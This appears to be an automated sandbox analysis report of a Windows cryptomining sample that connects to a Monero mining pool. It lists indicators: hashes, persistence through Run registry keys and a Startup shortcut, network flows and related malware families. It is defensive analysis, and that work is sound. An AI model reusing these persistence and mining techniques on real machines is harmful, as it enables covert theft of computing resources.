http://www.fontbureau.como | Vsob3IooE7.exe, 00000000.00000003.398298313.0000000006278000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.424132747.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.398207029.0000000006278000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.comalic | Vsob3IooE7.exe, 00000000.00000003.396117342.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.396175898.000000000627A000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/~w | Vsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.comue9 | Vsob3IooE7.exe, 00000000.00000003.398298313.0000000006278000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.424132747.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.398207029.0000000006278000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
141.94.96.144 | pool-fr.supportxmr.com | Germany | 680 | DFN Verein zur Foerderung eines Deutschen Forschungsnetzes e | false
                                  Joe Sandbox Version:37.1.0 Beryl
                                  Analysis ID:873923
                                  Start date and time:2023-05-23 16:29:13 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 58s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:12
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:Vsob3IooE7.exe
                                  Original Sample Name:e7bf9f0c2c1977ddd8e139c13c27be0d.exe
                                  Detection:MAL
                                  Classification:mal100.expl.evad.mine.winEXE@13/3@1/1
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 88%
                                  • Number of executed functions: 44
                                  • Number of non-executed functions: 24
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Override analysis time to 240s for sample files taking high CPU consumption
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                  • Execution Graph export aborted for target Vsob3IooE7.exe, PID 2068 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
16:30:18 | API Interceptor | 1x Sleep call for process: Vsob3IooE7.exe modified
16:30:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
16:30:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Driver C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
16:30:46 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url
Match: 141.94.96.144
Associated Sample Name / URL | Detection | Threat Name
GameBar.exe | malicious | Xmrig
FTrondtloadws.exe | malicious | Xmrig
file.exe | malicious | Xmrig
GoogleUpdate.exe | malicious | Xmrig
d.py | malicious | PwnRig Miner
PYnsVrS3EX.exe | malicious | Xmrig
DHL Original Documents.exe | malicious | RHADAMANTHYS, Xmrig
xxx.elf | malicious | Xmrig
Match: pool-fr.supportxmr.com
Associated Sample Name / URL | Detection | Threat Name | Context
ruZVRNvu0Y.exe | malicious | LoaderBot, Xmrig | 141.94.96.71
GameBar.exe | malicious | Xmrig | 141.94.96.71
FTrondtloadws.exe | malicious | Xmrig | 141.94.96.71
file.exe | malicious | Xmrig | 141.94.96.71
file.exe | malicious | Xmrig | 141.94.96.144
GoogleUpdate.exe | malicious | Xmrig | 141.94.96.144
KMSPicoSetup.exe | malicious | Xmrig | 141.94.96.195
WvWlWr2HC0.exe | malicious | LoaderBot, RedLine, SmokeLoader, Vidar, Xmrig, zgRAT | 141.94.96.144
spread.exe | malicious | ETERNALBLUE, Xmrig | 141.94.96.144
target.ps1 | malicious | Xmrig | 141.94.96.144
Activator.exe | malicious | Xmrig | 141.94.96.144
d.py | malicious | PwnRig Miner | 141.94.96.71
file.exe | malicious | LoaderBot, Xmrig | 141.94.96.195
PYnsVrS3EX.exe | malicious | Xmrig | 141.94.96.71
PYnsVrS3EX.exe | malicious | Xmrig | 141.94.96.71
file.exe | malicious | RHADAMANTHYS, RedLine, Xmrig | 141.94.96.71
DHL ORIGINAL DOCUMENTS.exe | malicious | RHADAMANTHYS, Xmrig | 141.94.96.71
DHL Original Documents.exe | malicious | RHADAMANTHYS, Xmrig | 141.94.96.144
file.exe | malicious | RHADAMANTHYS, Vidar, Xmrig | 141.94.96.71
file.exe | malicious | PrivateLoader, RHADAMANTHYS, Xmrig | 141.94.96.71
Match: DFN Verein zur Foerderung eines Deutschen Forschungsnetzes e
Associated Sample Name / URL | Detection | Threat Name | Context
MTSpago3242142023.xls | malicious | GuLoader | 141.94.149.125
D4EATj8S1c.elf | malicious | Mirai, Moobot | 141.9.112.43
c7n8Y8b877.elf | malicious | Unknown | 212.201.156.65
xyK0juuSuG.elf | malicious | Mirai, Moobot | 134.77.67.255
ruZVRNvu0Y.exe | malicious | LoaderBot, Xmrig | 141.94.96.195
GameBar.exe | malicious | Xmrig | 141.94.96.144
SPL242523535252525235.xls | malicious | FormBook | 141.94.149.125
feobBkGOei.elf | malicious | Mirai | 195.37.8.77
VsAKb3sxAu.elf | malicious | Mirai | 141.65.230.90
iHDZW6bttX.elf | malicious | Mirai | 193.174.13.220
OBBVGwjkM1.elf | malicious | Mirai | 141.60.164.212
FWcYZPr3YJ.elf | malicious | Unknown | 141.65.242.27
p1FejiLL02.elf | malicious | Mirai | 130.183.198.220
xoeNOJm8Gu.elf | malicious | Unknown | 130.183.251.24
UiodpDMy4N.elf | malicious | Unknown | 141.9.224.167
UI721.bin.exe | malicious | AgentTesla, LockBit ransomware, LummaC Stealer, RedLine, TrojanRansom, zgRAT | 141.94.149.125
x86.elf | malicious | Unknown | 149.201.32.191
P1sYDU1Ihc.elf | malicious | Mirai, Moobot | 134.28.97.169
D9auh16sL0.elf | malicious | Unknown | 132.253.146.54
yJNmeNWeST.elf | malicious | Mirai, Moobot | 193.174.114.255
                                                  No context
Match: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe
Associated Sample Name / URL | Detection | Threat Name
ruZVRNvu0Y.exe | malicious | LoaderBot, Xmrig
file.exe | malicious | LoaderBot, Xmrig
WvWlWr2HC0.exe | malicious | LoaderBot, RedLine, SmokeLoader, Vidar, Xmrig, zgRAT
file.exe | malicious | LoaderBot, Xmrig
8ulUl36eYw.exe | malicious | Fabookie, ManusCrypt, PrivateLoader, Raccoon Stealer v2, RedLine, SmokeLoader, Tofsee
file.exe | malicious | RedLine, Xmrig
2CH4QX76nU.exe | malicious | LoaderBot, Xmrig
mQRqXgFxJR.exe | malicious | LoaderBot, Xmrig
tIH5DUSVGF.exe | malicious | LoaderBot, Xmrig
rnFMPDf3RV.exe | malicious | LoaderBot, RedLine, Xmrig
VJO8DJVqC0.exe | malicious | LoaderBot, Xmrig
lcDlB6uuzr.exe | malicious | LoaderBot, RedLine, Xmrig
3Yfr0pHudU.exe | malicious | LoaderBot, Xmrig
5622_1647967473_729.exe | malicious | Xmrig
2862_1647970205_130.exe | malicious | Xmrig
SGH9m3w8Hx.exe | malicious | Xmrig
WQw4XERnFl.exe | malicious | Xmrig
8vprKeDXuJ.exe | malicious | RedLine, Xmrig
4nmeEJrZJ9.exe | malicious | Phoenix Stealer, Xmrig
DmpOiwahZV.exe | malicious | RedLine, Xmrig
                                                                                          Process:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1314
                                                                                          Entropy (8bit):5.350128552078965
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                          MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                          SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                          SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                          SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                          Process:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<file:///C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe>), ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):166
                                                                                          Entropy (8bit):5.0924278210562015
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:HRAbABGQYm5uOUkh4EaKC5SQnRrF0rIJ4ovstwWDUWJRWz9F06kiWXU:HRYFVmwO9aZ5lZGEJlvstwWDNJAZG6kW
                                                                                          MD5:47B8F4176A78D858A4ABE8C9DC2FCA69
                                                                                          SHA1:6EF87AC0E0944352F520E48FBBDC944F8D91AC90
                                                                                          SHA-256:794E872B8C7B8C2B8D9199EAD7C66F39DA421F3C54A816DCD6C696F45E6BCEB0
                                                                                          SHA-512:951118DDE1499EAEFDDD6A282FCC58BA71688E9F72F93820FBA24CF6298CB85D53E5903AE12D0DDE50C2D9D476C8C46CC94A79B796C9052CEDDF0655D83CF5F7
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: URL_File_Local_EXE, Description: Detects an .url file that points to a local executable, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, Author: Florian Roth (Nextron Systems)
                                                                                          • Rule: Methodology_Suspicious_Shortcut_Local_URL, Description: Detects local script usage for .URL persistence, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url, Author: @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson)
                                                                                          Reputation:low
                                                                                          Preview:[InternetShortcut]..URL=file:///C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe..IconIndex=0..IconFile=C:\Users\user\Desktop\Vsob3IooE7.exe\backup (3).ico..
                                                                                          Process:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          File Type:MS-DOS executable PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
                                                                                          Category:dropped
                                                                                          Size (bytes):4141064
                                                                                          Entropy (8bit):5.210440836800201
                                                                                          Encrypted:false
                                                                                          SSDEEP:49152:SNDFFPJu8fBsVE6ij+RNg+UKpBvtqB3m1RC3Z:wzP88fBsnZTgOtqB3m1RC3Z
                                                                                          MD5:02569A7A91A71133D4A1023BF32AA6F4
                                                                                          SHA1:0F16BCB3F3F085D3D3BE912195558E9F9680D574
                                                                                          SHA-256:8D6ABBA9B216172CFC64B8802DB0D20A1C634C96E1049F451EDDBA2363966BF0
                                                                                          SHA-512:534BE1FE93EE556A14CFD8FAD5377F57FB056AB4CD2BCA14E4F376F4A25D3D4D270917D68A90B3C40D8A8DAAEBA6F592FA095ECFF478332BA23405D1DF728322
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 71%
Joe Sandbox View:
• Filename: ruZVRNvu0Y.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: WvWlWr2HC0.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: 8ulUl36eYw.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: 2CH4QX76nU.exe, Detection: malicious
• Filename: mQRqXgFxJR.exe, Detection: malicious
• Filename: tIH5DUSVGF.exe, Detection: malicious
• Filename: rnFMPDf3RV.exe, Detection: malicious
• Filename: VJO8DJVqC0.exe, Detection: malicious
• Filename: lcDlB6uuzr.exe, Detection: malicious
• Filename: 3Yfr0pHudU.exe, Detection: malicious
• Filename: 5622_1647967473_729.exe, Detection: malicious
• Filename: 2862_1647970205_130.exe, Detection: malicious
• Filename: SGH9m3w8Hx.exe, Detection: malicious
• Filename: WQw4XERnFl.exe, Detection: malicious
• Filename: 8vprKeDXuJ.exe, Detection: malicious
• Filename: 4nmeEJrZJ9.exe, Detection: malicious
• Filename: DmpOiwahZV.exe, Detection: malicious
                                                                                          Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......^.........."...........k.....N2.........@.............................P........?... ..................................................0..P....@..../...W.......>..:...........................................................0...............................MPRESS1. ...............................MPRESS2.....0...........................rsrc...../..@..../.................@..............................................................v2.19..L...H...(.@.......H.......H.....`..f.@....H....O..H..(..0...&......*.....4%. 0.h. <...W..3.3.A...(.....1(.....0 ...0@.......`..N..Q.......w.....3.H...]K..X.ev.u. [.? L._.k\...........G..q\....Q..@. ......_0...+.........!.8..X0.W....t.".I.%. .. .............~.....~....S.~Cp.W:~..................O.A ...p\........L..`..O..........3.i.e...lA..A.....H...I;..|.....O=.p....-..........3..K/.. ~.@.Q0G.."...Q......)..(..".!......@..P.)...%O.H.1......X0......G.X.XP....^Q..5|^2.E
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.8010200183533485
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          File name:Vsob3IooE7.exe
                                                                                          File size:2842624
                                                                                          MD5:e7bf9f0c2c1977ddd8e139c13c27be0d
                                                                                          SHA1:e91aff3d9a8c7cef0e9543350864971e4ad93f82
                                                                                          SHA256:a615a2c647bce3b67f43c818a7fd972a653a605efce83b7eb6f38fb374ec8eba
                                                                                          SHA512:d9961824b178944aec2411c1bb29a5ef4b487ce0c251fe381e2841c6abe00f29ecf895ab1baf93e49442af07a14acdcf9d882519d39beb5c4d4902db2db2560f
                                                                                          SSDEEP:49152:552sxwTr/VsoJteujcnqNwelN/z52r7zj9n0cqv/3SYd:55jxa3JteujcncNNQzj9hqXCY
                                                                                          TLSH:A9D5CF7C86B50EB7D0F7C7E457C4B817BAADAB33B10C9A2145D2439D026F96224DE42E
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................P..V+.........2t+.. ....+...@.. ........................+...........@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x6b7432
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0xA019F57F [Fri Feb 12 14:36:47 2055 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x2b73df         0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2b8000         0x5b4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2ba000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x2b4fa0         0x70          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x2b5438      0x2b5600  unknown   unknown             unknown    unknown              IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x2b8000         0x5b4         0x600     False     0.4231770833333333  data       4.100599837122123    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x2ba000         0xc           0x200     False     0.044921875         data       0.09800417566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                                                                                Language  Country
RT_VERSION   0x2b8090  0x324  data
RT_MANIFEST  0x2b83c4  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
May 23, 2023 16:30:42.966169119 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:30:42.985848904 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:30:42.986406088 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:30:43.065582991 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:30:43.085134029 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:30:43.085624933 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:30:43.282708883 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:30:56.877768993 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:30:57.080768108 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:31:01.491835117 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:31:01.581163883 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:31:03.776058912 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:31:03.880321026 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:31:13.896189928 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:31:13.980247021 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:31:25.782275915 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:31:25.880122900 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:31:37.728445053 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:31:37.885164976 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:31:47.966363907 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:31:48.182876110 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:31:56.923937082 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:31:57.074263096 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:31:59.201129913 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:31:59.387062073 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:32:10.388082981 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:32:10.575385094 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:32:21.562840939 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:32:21.686986923 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:32:36.864428043 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:32:37.077795029 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:32:51.504137993 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:32:51.578978062 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:32:51.696830988 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:32:51.716387033 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:32:51.738040924 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:32:51.891436100 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:32:56.988322020 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:32:57.079406023 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:33:01.595695019 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:33:01.689155102 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:33:11.628896952 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:33:11.690028906 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:33:22.149544954 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:33:22.190901995 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:33:34.855365038 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:33:34.895766020 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:33:35.652163029 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:33:35.895600080 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:33:46.998639107 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:33:47.083633900 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:33:54.681701899 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:33:54.896764040 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:33:57.031797886 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:33:57.084539890 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:34:04.661757946 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:34:04.912950993 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:34:17.348527908 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:34:17.398740053 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:34:27.696890116 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:34:27.915334940 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:34:30.048935890 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:34:30.196691036 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:34:43.032084942 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:34:43.088433027 CEST  49715        3333       192.168.2.5    141.94.96.144
May 23, 2023 16:34:53.160926104 CEST  3333         49715      141.94.96.144  192.168.2.5
May 23, 2023 16:34:53.401909113 CEST  49715        3333       192.168.2.5    141.94.96.144
Timestamp                             Source Port  Dest Port  Source IP    Dest IP
May 23, 2023 16:30:42.908279896 CEST  51441        53         192.168.2.5  8.8.8.8
May 23, 2023 16:30:42.943305969 CEST  53           51441      8.8.8.8      192.168.2.5
Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
May 23, 2023 16:30:42.908279896 CEST  192.168.2.5  8.8.8.8  0x1db3    Standard query (0)  pool.supportxmr.com  A (IP address)  IN (0x0001)  false
Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                    CName                   Address        Type                    Class        DNS over HTTPS
May 23, 2023 16:30:42.943305969 CEST  8.8.8.8    192.168.2.5  0x1db3    No error (0)  pool.supportxmr.com     pool-fr.supportxmr.com                 CNAME (Canonical name)  IN (0x0001)  false
May 23, 2023 16:30:42.943305969 CEST  8.8.8.8    192.168.2.5  0x1db3    No error (0)  pool-fr.supportxmr.com                          141.94.96.144  A (IP address)          IN (0x0001)  false
May 23, 2023 16:30:42.943305969 CEST  8.8.8.8    192.168.2.5  0x1db3    No error (0)  pool-fr.supportxmr.com                          141.94.96.71   A (IP address)          IN (0x0001)  false
May 23, 2023 16:30:42.943305969 CEST  8.8.8.8    192.168.2.5  0x1db3    No error (0)  pool-fr.supportxmr.com                          141.94.96.195  A (IP address)          IN (0x0001)  false
Target ID: 0
Start time: 16:30:09
Start date: 23/05/2023
Path: C:\Users\user\Desktop\Vsob3IooE7.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\Vsob3IooE7.exe
Imagebase: 0xa90000
File size: 2842624 bytes
MD5 hash: E7BF9F0C2C1977DDD8E139C13C27BE0D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: low

Target ID: 3
Start time: 16:30:23
Start date: 23/05/2023
Path: C:\Users\user\Desktop\Vsob3IooE7.exe
Wow64 process (32bit): false
Commandline: {path}
Imagebase: 0x250000
File size: 2842624 bytes
MD5 hash: E7BF9F0C2C1977DDD8E139C13C27BE0D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 4
Start time: 16:30:23
Start date: 23/05/2023
Path: C:\Users\user\Desktop\Vsob3IooE7.exe
Wow64 process (32bit): false
Commandline: {path}
Imagebase: 0x180000
File size: 2842624 bytes
MD5 hash: E7BF9F0C2C1977DDD8E139C13C27BE0D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

                                                                                          Target ID:5
                                                                                          Start time:16:30:23
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\Desktop\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:{path}
                                                                                          Imagebase:0x9b0000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:.Net C# or VB.NET
                                                                                          Reputation:low

                                                                                          Target ID:6
                                                                                          Start time:16:30:35
                                                                                          Start date:23/05/2023
                                                                                          Path:C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe"
                                                                                          Imagebase:0x8f0000
                                                                                          File size:2842624 bytes
                                                                                          MD5 hash:E7BF9F0C2C1977DDD8E139C13C27BE0D
